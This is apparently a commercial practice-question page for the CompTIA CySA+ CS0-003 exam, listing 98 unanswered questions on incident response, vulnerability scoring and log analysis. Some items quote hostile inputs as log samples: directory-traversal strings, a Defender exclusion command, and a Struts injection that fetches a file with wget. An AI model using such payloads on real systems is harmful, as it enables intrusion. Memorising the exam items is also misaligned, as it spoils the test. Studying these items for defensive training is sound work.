Pre-Summer Special Flat 65% Limited Time Discount offer - Ends in 0d 00h 00m 00s - Coupon code: suredis

CompTIA CS0-003 CompTIA CyberSecurity Analyst CySA+ Certification Exam Exam Practice Test

Demo: 126 questions
Total 422 questions

CompTIA CyberSecurity Analyst CySA+ Certification Exam Questions and Answers

Question 1

An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?

Options:

A.

Beaconing

B.

Cross-site scripting

C.

Buffer overflow

D.

PHP traversal

Question 2

An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the first step for the security team to take to ensure compliance with the request?

Options:

A.

Publicly disclose the request to other vendors.

B.

Notify the departments involved to preserve potentially relevant information.

C.

Establish a chain of custody, starting with the attorney's request.

D.

Back up the mailboxes on the server and provide the attorney with a copy.

Question 3

A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that crypto mining is occurring. Which of the following indicators would

most likely lead the team to this conclusion?

.

Options:

A.

High GPU utilization

B.

Bandwidth consumption

C.

Unauthorized changes

D.

Unusual traffic spikes

Question 4

A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?

Options:

A.

function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” }

B.

function x() { info=$(geoiplookup $1) && echo “$1 | $info” }

C.

function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }

D.

function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }

Question 5

An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration?

Options:

A.

CIS Benchmarks

B.

PCI DSS

C.

OWASP Top Ten

D.

ISO 27001

Question 6

Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?

Options:

A.

Deploy a database to aggregate the logging.

B.

Configure the servers to forward logs to a SIEM-

C.

Share the log directory on each server to allow local access,

D.

Automate the emailing of logs to the analysts.

Question 7

An analyst has discovered the following suspicious command:

Which of the following would best describe the outcome of the command?

Options:

A.

Cross-site scripting

B.

Reverse shell

C.

Backdoor attempt

D.

Logic bomb

Question 8

An incident response team is assessing attack vectors of malware that is encrypting data with ransomware. There are no indications of a network-based intrusion.

Which of the following is the most likely root cause of the incident?

Options:

A.

USB drop

B.

LFI

C.

Cross-site forgery

D.

SQL injection

Question 9

An employee downloads a freeware program to change the desktop to the classic look of legacy Windows. Shortly after the employee installs the program, a high volume of random DNS queries begin

to originate from the system. An investigation on the system reveals the following:

Add-MpPreference -ExclusionPath '%Program Filest\ksysconfig'

Which of the following is possibly occurring?

Options:

A.

Persistence

B.

Privilege escalation

C.

Credential harvesting

D.

Defense evasion

Question 10

Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

Options:

A.

Command and control

B.

Actions on objectives

C.

Exploitation

D.

Delivery

Question 11

A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls, and two-factor authentication. Which of the following

does this most likely describe?

Options:

A.

System hardening

B.

Hybrid network architecture

C.

Continuous authorization

D.

Secure access service edge

Question 12

A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?

Options:

A.

Offline storage

B.

Evidence collection

C.

Integrity validation

D.

Legal hold

Question 13

A company's internet-facing web application has been compromised several times due to identified design flaws. The company would like to minimize the risk of these incidents from reoccurring and has provided the developers with better security training. However, the company cannot allocate any more internal resources to the issue. Which of the following are the best options to help identify flaws within the system? (Select two).

Options:

A.

Deploying a WAF

B.

Performing a forensic analysis

C.

Contracting a penetration test

D.

Holding a tabletop exercise

E.

Creating a bug bounty program

F.

Implementing threat modeling

Question 14

A security manager reviews the permissions for the approved users of a shared folder and finds accounts that are not on the approved access list. While investigating an incident, a user discovers data discrepancies in the file. Which of the following best describes this activity?

Options:

A.

Filesystem anomaly

B.

Illegal software

C.

Unauthorized changes

D.

Data exfiltration

Question 15

A security analyst is reviewing events that occurred during a possible compromise. The analyst obtains the following log:

Which of the following is most likely occurring, based on the events in the log?

Options:

A.

An adversary is attempting to find the shortest path of compromise.

B.

An adversary is performing a vulnerability scan.

C.

An adversary is escalating privileges.

D.

An adversary is performing a password stuffing attack..

Question 16

AXSS vulnerability was reported on one of the non-sensitive/non-mission-critical public websites of a company. The security department confirmed the finding and needs to provide a recommendation to the application owner. Which of the following recommendations will best prevent this vulnerability from being exploited? (Select two).

Options:

A.

Implement an IPS in front of the web server.

B.

Enable MFA on the website.

C.

Take the website offline until it is patched.

D.

Implement a compensating control in the source code.

E.

Configure TLS v1.3 on the website.

F.

Fix the vulnerability using a virtual patch at the WAF.

Question 17

A threat hunter seeks to identify new persistence mechanisms installed in an organization's environment. In collecting scheduled tasks from all enterprise workstations, the following host details are aggregated:

Which of the following actions should the hunter perform first based on the details above?

Options:

A.

Acquire a copy of taskhw.exe from the impacted host

B.

Scan the enterprise to identify other systems with taskhw.exe present

C.

Perform a public search for malware reports on taskhw.exe.

D.

Change the account that runs the -caskhw. exe scheduled task

Question 18

An organization's email account was compromised by a bad actor. Given the following Information:

Which of the following is the length of time the team took to detect the threat?

Options:

A.

25 minutes

B.

40 minutes

C.

45 minutes

D.

2 hours

Question 19

A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?

Options:

A.

C2 beaconing activity

B.

Data exfiltration

C.

Anomalous activity on unexpected ports

D.

Network host IP address scanning

E.

A rogue network device

Question 20

A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?

Options:

A.

Scan the employee's computer with virus and malware tools.

B.

Review the actions taken by the employee and the email related to the event

C.

Contact human resources and recommend the termination of the employee.

D.

Assign security awareness training to the employee involved in the incident.

Question 21

A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being

used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?

Options:

A.

Leave the proxy as is.

B.

Decomission the proxy.

C.

Migrate the proxy to the cloud.

D.

Patch the proxy

Question 22

While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following should be checked first?

Options:

A.

If appropriate logging levels are set

B.

NTP configuration on each system

C.

Behavioral correlation settings

D.

Data normalization rules

Question 23

While a security analyst for an organization was reviewing logs from web servers. the analyst found several successful attempts to downgrade HTTPS sessions to use cipher modes of operation susceptible to padding oracle attacks. Which of the following combinations of configuration changes should the organization make to remediate this issue? (Select two).

Options:

A.

Configure the server to prefer TLS 1.3.

B.

Remove cipher suites that use CBC.

C.

Configure the server to prefer ephemeral modes for key exchange.

D.

Require client browsers to present a user certificate for mutual authentication.

E.

Configure the server to require HSTS.

F.

Remove cipher suites that use GCM.

Question 24

An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?

Options:

A.

DKIM

B.

SPF

C.

SMTP

D.

DMARC

Question 25

During an incident, a security analyst discovers a large amount of Pll has been emailed externally from an employee to a public email address. The analyst finds that the external email is the employee's

personal email. Which of the following should the analyst recommend be done first?

Options:

A.

Place a legal hold on the employee's mailbox.

B.

Enable filtering on the web proxy.

C.

Disable the public email access with CASB.

D.

Configure a deny rule on the firewall.

Question 26

Which of the following is a benefit of the Diamond Model of Intrusion Analysis?

Options:

A.

It provides analytical pivoting and identifies knowledge gaps.

B.

It guarantees that the discovered vulnerability will not be exploited again in the future.

C.

It provides concise evidence that can be used in court

D.

It allows for proactive detection and analysis of attack events

Question 27

Which of the following is a commonly used four-component framework to communicate threat actor behavior?

Options:

A.

STRIDE

B.

Diamond Model of Intrusion Analysis

C.

Cyber Kill Chain

D.

MITRE ATT&CK

Question 28

An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?

Options:

A.

Take a snapshot of the compromised server and verify its integrity

B.

Restore the affected server to remove any malware

C.

Contact the appropriate government agency to investigate

D.

Research the malware strain to perform attribution

Question 29

A security analyst must preserve a system hard drive that was involved in a litigation request Which of the following is the best method to ensure the data on the device is not modified?

Options:

A.

Generate a hash value and make a backup image.

B.

Encrypt the device to ensure confidentiality of the data.

C.

Protect the device with a complex password.

D.

Perform a memory scan dump to collect residual data.

Question 30

A Chief Information Security Officer has requested a dashboard to share critical vulnerability management goals with company leadership.

Which of the following would be the best to include in the dashboard?

Options:

A.

KPI

B.

MOU

C.

SLO

D.

SLA

Question 31

A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access prior to more in-depth scanning. Which of following best fits the type of scanning activity requested?

Options:

A.

Uncredentialed scan

B.

Discqyery scan

C.

Vulnerability scan

D.

Credentialed scan

Question 32

A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?

Options:

A.

Geoblock the offending source country

B.

Block the IP range of the scans at the network firewall.

C.

Perform a historical trend analysis and look for similar scanning activity.

D.

Block the specific IP address of the scans at the network firewall

Question 33

Exploit code for a recently disclosed critical software vulnerability was publicly available (or download for several days before being removed. Which of the following CVSS v.3.1 temporal metrics was most impacted by this exposure?

Options:

A.

Remediation level

B.

Exploit code maturity

C.

Report confidence

D.

Availability

Question 34

Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported? (Select two).

Options:

A.

Signal-shielded bag

B.

Tamper-evident seal

C.

Thumb drive

D.

Crime scene tape

E.

Write blocker

F.

Drive duplicator

Question 35

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?

Options:

A.

Hard disk

B.

Primary boot partition

C.

Malicious tiles

D.

Routing table

E.

Static IP address

Question 36

Which of the following would eliminate the need for different passwords for a variety or internal application?

Options:

A.

CASB

B.

SSO

C.

PAM

D.

MFA

Question 37

An analyst reviews the following web server log entries:

%2E%2E/%2E%2E/%2ES2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd

No attacks or malicious attempts have been discovered. Which of the following most likely describes what took place?

Options:

A.

A SQL injection query took place to gather information from a sensitive file.

B.

A PHP injection was leveraged to ensure that the sensitive file could be accessed.

C.

Base64 was used to prevent the IPS from detecting the fully encoded string.

D.

Directory traversal was performed to obtain a sensitive file for further reconnaissance.

Question 38

While reviewing the web server logs a security analyst notices the following snippet

..\../..\../boot.ini

Which of the following is being attempted?

Options:

A.

Directory traversal

B.

Remote file inclusion

C.

Cross-site scripting

D.

Remote code execution

E.

Enumeration of/etc/pasawd

Question 39

Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Select two).

Options:

A.

Performing dynamic application security testing

B.

Reviewing the code

C.

Fuzzing the application

D.

Debugging the code

E.

Implementing a coding standard

F.

Implementing IDS

Question 40

Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?

Options:

A.

SLA

B.

LOI

C.

MOU

D.

KPI

Question 41

The management team requests monthly KPI reports on the company's cybersecurity program. Which of the following KPIs would identify how long a security threat goes unnoticed in the environment?

Options:

A.

Employee turnover

B.

Intrusion attempts

C.

Mean time to detect

D.

Level of preparedness

Question 42

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?

Options:

A.

Hacktivist threat

B.

Advanced persistent threat

C.

Unintentional insider threat

D.

Nation-state threat

Question 43

An organization has established a formal change management process after experiencing several critical system failures over the past year. Which of the following are key factors that the change management process will include in order to reduce the impact of system failures? (Select two).

Options:

A.

Ensure users the document system recovery plan prior to deployment.

B.

Perform a full system-level backup following the change.

C.

Leverage an audit tool to identify changes that are being made.

D.

Identify assets with dependence that could be impacted by the change.

E.

Require diagrams to be completed for all critical systems.

F.

Ensure that all assets are properly listed in the inventory management system.

Question 44

Which of the following statements best describes the MITRE ATT&CK framework?

Options:

A.

It provides a comprehensive method to test the security of applications.

B.

It provides threat intelligence sharing and development of action and mitigation strategies.

C.

It helps identify and stop enemy activity by highlighting the areas where an attacker functions.

D.

It tracks and understands threats and is an open-source project that evolves.

E.

It breaks down intrusions into a clearly defined sequence of phases.

Question 45

An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?

Options:

A.

Disable the user's network account and access to web resources

B.

Make a copy of the files as a backup on the server.

C.

Place a legal hold on the device and the user's network share.

D.

Make a forensic image of the device and create a SRA-I hash.

Question 46

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?

Options:

A.

Mean time to detect

B.

Number of exploits by tactic

C.

Alert volume

D.

Quantity of intrusion attempts

Question 47

A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?

Options:

A.

Potential precursor to an attack

B.

Unauthorized peer-to-peer communication

C.

Rogue device on the network

D.

System updates

Question 48

A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the following information:

Which of the following vulnerabilities should be prioritized for remediation?

Options:

A.

nessie.explosion

B.

vote.4p

C.

sweet.bike

D.

great.skills

Question 49

A security analyst scans a host and generates the following output:

Which of the following best describes the output?

Options:

A.

The host is unresponsive to the ICMP request.

B.

The host Is running a vulnerable mall server.

C.

The host Is allowlng unsecured FTP connectlons.

D.

The host is vulnerable to web-based exploits.

Question 50

A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project:

. Must use minimal network bandwidth

. Must use minimal host resources

. Must provide accurate, near real-time updates

. Must not have any stored credentials in configuration on the scanner

Which of the following vulnerability scanning methods should be used to best meet these requirements?

Options:

A.

Internal

B.

Agent

C.

Active

D.

Uncredentialed

Question 51

A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following should the SOC manager utilize to improve the process?

Options:

A.

The most recent audit report

B.

The incident response playbook

C.

The incident response plan

D.

The lessons-learned register

Question 52

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

Options:

A.

TO provide metrics and test continuity controls

B.

To verify the roles of the incident response team

C.

To provide recommendations for handling vulnerabilities

D.

To perform tests against implemented security controls

Question 53

Which of the following best describes the importance of KPIs in an incident response exercise?

Options:

A.

To identify the personal performance of each analyst

B.

To describe how incidents were resolved

C.

To reveal what the team needs to prioritize

D.

To expose which tools should be used

Question 54

An organization is planning to adopt a zero-trust architecture. Which of the following is most aligned with this approach?

Options:

A.

Network segmentation to separate sensitive systems from the rest of the network.

B.

Whitelisting specific IP addresses that are allowed to access the network.

C.

Trusting users who successfully authenticate once with multifactor authentication.

D.

Automatically trusting internal network communications over external traffic.

Question 55

A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?

Options:

A.

AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0

B.

AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:L/A:L - Base Score 7.2

C.

AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4

D.

AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5

Question 56

A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to

reduce risks associated with the application development?

Options:

A.

Perform static analyses using an integrated development environment.

B.

Deploy compensating controls into the environment.

C.

Implement server-side logging and automatic updates.

D.

Conduct regular code reviews using OWASP best practices.

Question 57

While reviewing web server logs, a security analyst discovers the following suspicious line:

Which of the following is being attempted?

Options:

A.

Remote file inclusion

B.

Command injection

C.

Server-side request forgery

D.

Reverse shell

Question 58

An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the following is the most likely cause?

Options:

A.

The finding is a false positive and should be ignored.

B.

A rollback had been executed on the instance.

C.

The vulnerability scanner was configured without credentials.

D.

The vulnerability management software needs to be updated.

Question 59

A security analyst runs the following command:

# nmap -T4 -F 192.168.30.30

Starting nmap 7.6

Host is up (0.13s latency)

PORT STATE SERVICE

23/tcp open telnet

443/tcp open https

636/tcp open ldaps

Which of the following should the analyst recommend first to harden the system?

Options:

A.

Disable all protocols that do not use encryption.

B.

Configure client certificates for domain services.

C.

Ensure that this system is behind a NGFW.

D.

Deploy a publicly trusted root CA for secure websites.

Question 60

A company was able to reduce triage time by focusing on historical trend analysis. The business partnered with the security team to achieve a 50% reduction in phishing attempts year over year. Which of the following action plans led to this reduced triage time?

Options:

A.

Patching

B.

Configuration management

C.

Awareness, education, and training

D.

Threat modeling

Question 61

An organization's threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?

Options:

A.

Disable administrative accounts for any operations.

B.

Implement MFA requirements for all internal resources.

C.

Harden systems by disabling or removing unnecessary services.

D.

Implement controls to block execution of untrusted applications.

Question 62

The analyst reviews the following endpoint log entry:

Which of the following has occurred?

Options:

A.

Registry change

B.

Rename computer

C.

New account introduced

D.

Privilege escalation

Question 63

An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities:

CVSS: 3.1/AV:N/AC: L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:W/RC:R

Which of the following represents the exploit code maturity of this critical vulnerability?

Options:

A.

E:U

B.

S:C

C.

RC:R

D.

AV:N

E.

AC:L

Question 64

A SOC manager reviews metrics from the last four weeks to investigate a recurring availability issue. The manager finds similar events correlating to the times of the reported issues.

Which of the following methods would the manager most likely use to resolve the issue?

Options:

A.

Vulnerability assessment

B.

Root cause analysis

C.

Recurrence reports

D.

Lessons learned

Question 65

Executives at an organization email sensitive financial information to external business partners when negotiating valuable contracts. To ensure the legal validity of these messages, the cybersecurity team recommends a digital signature be added to emails sent by the executives. Which of the following are the primary goals of this recommendation? (Select two).

Options:

A.

Confidentiality

B.

Integrity

C.

Privacy

D.

Anonymity

E.

Non-repudiation

F.

Authorization

Question 66

A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control. Which of the following is the best compensating control?

Options:

A.

Running regular penetration tests to identify and address new vulnerabilities

B.

Conducting regular security awareness training of employees to prevent social engineering attacks

C.

Deploying an additional layer of access controls to verify authorized individuals

D.

Implementing intrusion detection software to alert security teams of unauthorized access attempts

Question 67

Which of the following is a nation-state actor least likely to be concerned with?

Options:

A.

Detection by MITRE ATT&CK framework.

B.

Detection or prevention of reconnaissance activities.

C.

Examination of its actions and objectives.

D.

Forensic analysis for legal action of the actions taken

Question 68

A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed more quickly about new patches. Which of the following would most likely be required by the infrastructure team so that vulnerabilities can be remediated quickly? (Select two).

Options:

A.

Hostname

B.

Missing KPI

C.

CVE details

D.

POC availability

E.

loCs

F.

npm identifier

Question 69

After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management principles is the company exercising?

Options:

A.

Transfer

B.

Accept

C.

Mitigate

D.

Avoid

Question 70

A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:

Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?

Options:

A.

InLoud:Cobain: YesGrohl: NoNovo: YesSmear: YesChanning: No

B.

TSpirit:Cobain: YesGrohl: YesNovo: YesSmear: NoChanning: No

C.

ENameless:Cobain: YesGrohl: NoNovo: YesSmear: NoChanning: No

D.

PBleach:Cobain: YesGrohl: NoNovo: NoSmear: NoChanning: Yes

Question 71

A security analyst needs to identify a computer based on the following requirements to be mitigated:

    The attack method is network-based with low complexity.

    No privileges or user action is needed.

    The confidentiality and availability level is high, with a low integrity level.

Given the following CVSS 3.1 output:

    Computer1: CVSS3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H

    Computer2: CVSS3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H

    Computer3: CVSS3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:H

    Computer4: CVSS3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H

Which of the following machines should the analyst mitigate?

Options:

A.

Computer1

B.

Computer2

C.

Computer3

D.

Computer4

Question 72

A security administrator has found indications of dictionary attacks against the company's external-facing portal. Which of the following should be implemented to best mitigate the password attacks?

Options:

A.

Multifactor authentication

B.

Password complexity

C.

Web application firewall

D.

Lockout policy

Question 73

During a training exercise, a security analyst must determine the vulnerabilities to prioritize. The analyst reviews the following vulnerability scan output:

Which of the following issues should the analyst address first?

Options:

A.

Allows anonymous read access to /etc/passwd

B.

Allows anonymous read access via any FTP connection

C.

Microsoft Defender security definition updates disabled

D.

less command allows for escape exploit via terminal

Question 74

Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-when information and evaluate the effectiveness of the plans in place. Which of the following incident management life cycle processes

does this describe?

Options:

A.

Business continuity plan

B.

Lessons learned

C.

Forensic analysis

D.

Incident response plan

Question 75

Which of the following best describes the key elements of a successful information security program?

Options:

A.

Business impact analysis, asset and change management, and security communication plan

B.

Security policy implementation, assignment of roles and responsibilities, and information asset classification

C.

Disaster recovery and business continuity planning, and the definition of access control requirements and human resource policies

D.

Senior management organizational structure, message distribution standards, and procedures for the operation of security management systems

Question 76

A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?

Options:

A.

CVSS 3.0/AVP/AC:L/PR:L/UI:N/S U/C:H/I:H/A:H

B.

CVSS 3.0/AV:A/AC .L/PR:L/UI:N/S:U/C:H/I:H/A:H

C.

CVSS 3.0/AV:N/AC:L/PR:L/UI:N/S;U/C:H/I:H/A:H

D.

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Question 77

Which of the following items should be included in a vulnerability scan report? (Choose two.)

Options:

A.

Lessons learned

B.

Service-level agreement

C.

Playbook

D.

Affected hosts

E.

Risk score

F.

Education plan

Question 78

Which of the following most accurately describes the Cyber Kill Chain methodology?

Options:

A.

It is used to correlate events to ascertain the TTPs of an attacker.

B.

It is used to ascertain lateral movements of an attacker, enabling the process to be stopped.

C.

It provides a clear model of how an attacker generally operates during an intrusion and the actions to take at each stage

D.

It outlines a clear path for determining the relationships between the attacker, the technology used, and the target

Question 79

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

Options:

A.

Business continuity plan

B.

Vulnerability management plan

C.

Disaster recovery plan

D.

Asset management plan

Question 80

A security analyst receives an alert for suspicious activity on a company laptop An excerpt of the log is shown below:

Which of the following has most likely occurred?

Options:

A.

An Office document with a malicious macro was opened.

B.

A credential-stealing website was visited.

C.

A phishing link in an email was clicked

D.

A web browser vulnerability was exploited.

Question 81

A security analyst is reviewing a recent vulnerability scan report for a new server infrastructure. The analyst would like to make the best use of time by resolving the most critical vulnerability first. The following information is provided:

Which of the following should the analyst concentrate remediation efforts on first?

Options:

A.

SVR01

B.

SVR02

C.

SVR03

D.

SVR04

Question 82

While reviewing web server logs, a security analyst found the following line:

Which of the following malicious activities was attempted?

Options:

A.

Command injection

B.

XML injection

C.

Server-side request forgery

D.

Cross-site scripting

Question 83

A systems administrator notices unfamiliar directory names on a production server. The administrator reviews the directory listings and files, and then concludes the server has been

compromised. Which of the following steps should the administrator take next?

Options:

A.

Inform the internal incident response team.

B.

Follow the company's incident response plan.

C.

Review the lessons learned for the best approach.

D.

Determine when the access started.

Question 84

A high volume of failed RDP authentication attempts was logged on a critical server within a one-hour period. All of the attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following would be the most effective mitigating control to reduce the rate of success of this brute-force attack?

Options:

A.

Enabling a user account lockout after a limited number of failed attempts

B.

Installing a third-party remote access tool and disabling RDP on all devices

C.

Implementing a firewall block for the remote system's IP address

D.

Increasing the verbosity of log-on event auditing on all devices

Question 85

While reviewing the web server logs, a security analyst notices the following snippet:

.. \ .. / .. \ .. /boot.ini

Which of the following Is belng attempted?

Options:

A.

Directory traversal

B.

Remote file inclusion

C.

Cross-site scripting

D.

Remote code execution

E.

Enumeration of /etc/passwd

Question 86

A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurred by an issue?

Options:

A.

Trends

B.

Risk score

C.

Mitigation

D.

Prioritization

Question 87

A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?

Options:

A.

Implement segmentation with ACLs.

B.

Configure logging and monitoring to the SIEM.

C.

Deploy MFA to cloud storage locations.

D.

Roll out an IDS.

Question 88

An analyst is reviewing system logs while threat hunting:

Which of the following hosts should be investigated first?

Options:

A.

PC1

B.

PC2

C.

PC3

D.

PC4

E.

PC5

Question 89

A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment Which of the following must be considered to ensure the consultant does no harm to operations?

Options:

A.

Employing Nmap Scripting Engine scanning techniques

B.

Preserving the state of PLC ladder logic prior to scanning

C.

Using passive instead of active vulnerability scans

D.

Running scans during off-peak manufacturing hours

Question 90

Which of the following is the best use of automation in cybersecurity?

Options:

A.

Ensure faster incident detection, analysis, and response.

B.

Eliminate configuration errors when implementing new hardware.

C.

Lower costs by reducing the number of necessary staff.

D.

Reduce the time for internal user access requests.

Question 91

A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and has decided that the risk is not high enough to correct at this time. Which of the following inhibitors to remediation does this scenario illustrate?

Options:

A.

Service-level agreement

B.

Business process interruption

C.

Degrading functionality

D.

Proprietary system

Question 92

Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

Options:

A.

Develop a call tree to inform impacted users

B.

Schedule a review with all teams to discuss what occurred

C.

Create an executive summary to update company leadership

D.

Review regulatory compliance with public relations for official notification

Question 93

Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?

Options:

A.

MITRE ATTACK

B.

Cyber Kill Cham

C.

OWASP

D.

STIXTAXII

Question 94

An incident response team member is triaging a Linux server. The output is shown below:

$ cat /etc/passwd

root:x:0:0::/:/bin/zsh

bin:x:1:1::/:/usr/bin/nologin

daemon:x:2:2::/:/usr/bin/nologin

mail:x:8:12::/var/spool/mail:/usr/bin/nologin

http:x:33:33::/srv/http:/bin/bash

nobody:x:65534:65534:Nobody:/:/usr/bin/nologin

git:x:972:972:git daemon user:/:/usr/bin/git-shell

$ cat /var/log/httpd

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)

WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)

at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)

at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)

Which of the following is the adversary most likely trying to do?

Options:

A.

Create a backdoor root account named zsh.

B.

Execute commands through an unsecured service account.

C.

Send a beacon to a command-and-control server.

D.

Perform a denial-of-service attack on the web server.

Question 95

Which of the following is most appropriate to use with SOAR when the security team would like to automate actions across different vendor platforms?

Options:

A.

STIX/TAXII

B.

APIs

C.

Data enrichment

D.

Threat feed

Question 96

An organization has noticed large amounts of data are being sent out of its network. An

analyst is identifying the cause of the data exfiltration.

INSTRUCTIONS

Select the command that generated the output in tabs 1 and 2.

Review the output text in all tabs and identify the file responsible for the malicious

behavior.

If at any time you would like to bring back the initial state of the simulation, please click

the Reset All button.

Options:

Question 97

A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system

owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to

categorize and prioritize the respective systems?

Options:

A.

Interview the users who access these systems,

B.

Scan the systems to see which vulnerabilities currently exist.

C.

Configure alerts for vendor-specific zero-day exploits.

D.

Determine the asset value of each system.

Question 98

An analyst views the following log entries:

The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required to have access to monthly reports and is the only external vendor with authorized access. The organization prioritizes incident investigation according to the following hierarchy: unauthorized data disclosure is more critical than denial of service attempts.

which are more important than ensuring vendor data access.

Based on the log files and the organization's priorities, which of the following hosts warrants additional investigation?

Options:

A.

121.19.30.221

B.

134.17.188.5

C.

202.180.1582

D.

216.122.5.5

Question 99

